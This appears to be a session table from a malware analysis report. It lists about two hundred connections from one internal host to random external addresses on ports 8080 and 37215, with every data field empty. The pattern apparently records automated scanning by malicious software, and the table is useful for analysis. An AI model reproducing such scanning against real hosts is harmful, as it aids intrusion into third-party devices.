                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12366192.168.2.2359204219.78.185.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12367192.168.2.235703412.81.180.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12368192.168.2.233863696.163.1.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12369192.168.2.235169265.119.21.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12370192.168.2.233613082.134.93.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12371192.168.2.2350124117.219.158.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12372192.168.2.233840041.185.38.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12373192.168.2.233323424.130.4.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12374192.168.2.235919612.183.51.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12375192.168.2.2342880122.88.88.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12376192.168.2.2340566200.171.170.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12377192.168.2.2356514114.200.34.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12378192.168.2.236044288.35.244.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12379192.168.2.233679023.145.50.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12380192.168.2.2354190204.17.34.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12381192.168.2.233522823.152.148.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12382192.168.2.2345286186.11.69.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12383192.168.2.2341606109.205.78.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12384192.168.2.23545805.81.137.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12385192.168.2.2337664169.188.157.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12386192.168.2.2337840116.158.44.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12387192.168.2.234259890.187.106.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12388192.168.2.235535617.241.211.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12389192.168.2.2337378137.215.142.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12390192.168.2.2345074145.88.181.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12391192.168.2.2352600157.182.226.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12392192.168.2.2356450138.236.190.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12393192.168.2.2359494126.228.135.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12394192.168.2.2358704150.130.201.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12395192.168.2.233315245.150.39.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12396192.168.2.2341352165.26.219.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12397192.168.2.2348106113.6.84.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12398192.168.2.235611663.219.239.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12399192.168.2.2350418138.37.188.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12400192.168.2.2356998161.125.52.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12401192.168.2.2347972126.38.18.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12402192.168.2.235607057.82.11.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12403192.168.2.233961860.50.222.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12404192.168.2.235830093.130.116.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12405192.168.2.234077089.109.76.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12406192.168.2.2358342168.133.158.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12407192.168.2.2357110180.94.180.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12408192.168.2.2346162208.183.49.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12409192.168.2.2360120218.12.138.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12410192.168.2.2357514152.231.106.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12411192.168.2.233848458.50.150.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12412192.168.2.236092057.136.136.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12413192.168.2.2342534208.115.188.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12414192.168.2.2350484119.151.37.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12415192.168.2.2351052158.31.224.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12416192.168.2.2356154138.104.234.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12417192.168.2.2346672138.232.32.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12418192.168.2.233376639.18.30.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12419192.168.2.233305836.219.30.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12420192.168.2.233629876.5.46.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12421192.168.2.2357984172.170.197.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12422192.168.2.2352712180.123.186.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12423192.168.2.234696224.185.244.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12424192.168.2.23441722.80.102.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12425192.168.2.2333566160.67.79.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12426192.168.2.2360252113.137.12.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12427192.168.2.235367297.141.68.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12428192.168.2.234248635.101.224.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12429192.168.2.233635095.119.52.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12430192.168.2.235592870.99.226.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12431192.168.2.233471813.89.200.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12432192.168.2.235041274.4.79.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12433192.168.2.2351458111.37.229.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12434192.168.2.233660619.158.15.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12435192.168.2.2360534117.92.128.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12436192.168.2.2338652179.93.78.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12437192.168.2.2360740157.10.40.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12438192.168.2.2347816114.56.88.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12439192.168.2.2341990201.107.121.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12440192.168.2.2335518140.64.3.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12441192.168.2.2356628172.163.91.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12442192.168.2.235316467.240.118.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12443192.168.2.235898454.0.239.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12444192.168.2.2341424218.223.217.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12445192.168.2.2337054171.42.3.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12446192.168.2.2343968121.76.81.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12447192.168.2.2343662126.227.231.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12448192.168.2.235434617.157.140.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12449192.168.2.234474025.112.172.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12450192.168.2.234942481.23.8.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12451192.168.2.235952650.163.34.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12452192.168.2.2346642120.172.161.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12453192.168.2.235120685.78.74.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12454192.168.2.2337694105.165.37.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12455192.168.2.2340982126.180.68.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12456192.168.2.235334018.3.171.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12457192.168.2.235426057.51.106.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12458192.168.2.23598682.49.11.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12459192.168.2.2343044107.133.116.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12460192.168.2.234867638.88.244.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12461192.168.2.235842083.58.67.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12462192.168.2.2343112199.129.39.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12463192.168.2.236071843.95.91.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12464192.168.2.2357892161.60.21.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12465192.168.2.2345600114.132.49.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12466192.168.2.2351422182.226.145.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12467192.168.2.233985873.233.211.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12468192.168.2.235098432.253.251.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12469192.168.2.2339760109.82.6.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12470192.168.2.2348486103.196.104.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12471192.168.2.2348374126.235.114.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12472192.168.2.234366242.162.12.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12473192.168.2.235472227.217.48.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12474192.168.2.234057832.92.41.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12475192.168.2.2333486179.189.27.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12476192.168.2.234182268.198.107.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12477192.168.2.235732012.152.41.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12478192.168.2.2351966197.138.176.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12479192.168.2.2344948101.182.12.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12480192.168.2.235776441.223.168.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12481192.168.2.2335364128.3.161.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12482192.168.2.2342778197.128.124.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12483192.168.2.2358590157.120.227.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12484192.168.2.233914041.220.254.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12485192.168.2.2333726157.181.89.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12486192.168.2.233609041.240.15.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12487192.168.2.234207241.134.74.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12488192.168.2.2349424157.184.115.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12489192.168.2.2343854197.196.24.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12490192.168.2.2355028181.21.118.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12491192.168.2.233337241.216.28.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12492192.168.2.235370441.136.15.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12493192.168.2.233618870.140.227.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12494192.168.2.235318441.50.199.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12495192.168.2.2352264197.84.177.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12496192.168.2.235585241.3.213.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12497192.168.2.2333030197.120.157.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12498192.168.2.2349078157.254.136.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12499192.168.2.2355316157.186.15.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12500192.168.2.236089041.45.187.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12501192.168.2.2358196197.72.179.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12502192.168.2.2339282197.1.244.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12503192.168.2.233362441.3.197.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12504192.168.2.233945441.229.104.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12505192.168.2.2353980197.187.60.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12506192.168.2.2354322157.8.115.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12507192.168.2.2338514197.236.202.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12508192.168.2.234920241.71.74.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12509192.168.2.234190241.135.110.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12510192.168.2.2354866197.113.170.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12511192.168.2.2337350197.83.133.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12512192.168.2.2338154197.93.209.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12513192.168.2.2351036157.13.68.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12514192.168.2.2359198197.45.231.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12515192.168.2.2343974218.37.102.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12516192.168.2.234015241.148.248.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12517192.168.2.235365441.198.22.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12518192.168.2.2354206102.14.205.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12519192.168.2.2340438123.69.84.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12520192.168.2.2360960197.135.216.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12521192.168.2.2334610157.249.161.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12522192.168.2.235680241.68.148.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12523192.168.2.235892451.1.36.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12524192.168.2.2347926197.35.189.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12525192.168.2.234571841.13.188.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12526192.168.2.2358126132.232.167.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12527192.168.2.235431241.231.91.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12528192.168.2.2335952132.149.170.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12529192.168.2.2360604157.195.59.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12530192.168.2.234991841.118.139.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12531192.168.2.235898841.75.173.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12532192.168.2.235558041.99.135.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12533192.168.2.2352684141.105.27.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12534192.168.2.235301841.190.122.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12535192.168.2.2335460197.110.199.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12536192.168.2.233632641.97.208.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12537192.168.2.233363841.23.82.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12538192.168.2.2351234197.127.60.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12539192.168.2.2345532197.175.116.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12540192.168.2.233371241.132.57.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12541192.168.2.2336474157.145.177.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12542192.168.2.2357146197.137.130.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12543192.168.2.2358628157.73.122.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12544192.168.2.2347930157.94.140.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12545192.168.2.2350980157.213.223.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12546192.168.2.234789031.61.101.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12547192.168.2.2354796157.238.89.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12548192.168.2.2343922157.97.7.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12549192.168.2.233496041.82.211.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12550192.168.2.2349372183.133.104.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12551192.168.2.2360160197.188.2.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12552192.168.2.2342840119.83.39.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12553192.168.2.2352774157.238.194.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12554192.168.2.2344454157.169.255.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12555192.168.2.2347516197.249.29.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12556192.168.2.234149441.108.12.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12557192.168.2.233323841.173.133.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12558192.168.2.233643234.234.14.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12559192.168.2.2360072172.66.143.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12560192.168.2.2355058185.229.65.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12561192.168.2.2338060157.72.251.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12562192.168.2.234927254.82.123.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12563192.168.2.235833696.52.95.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12564192.168.2.235161641.18.194.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12565192.168.2.233507641.3.54.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12566192.168.2.235852841.151.177.24937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12567192.168.2.23531661.135.32.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12568192.168.2.2347372197.63.121.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12569192.168.2.2355418157.79.149.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12570192.168.2.2338670157.102.64.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12571192.168.2.2343544157.175.94.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12572192.168.2.2340102200.228.121.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12573192.168.2.2349046197.97.35.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12574192.168.2.234691441.75.239.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12575192.168.2.2340606157.60.188.12637215
                                                        TimestampBytes transferredDirectionData


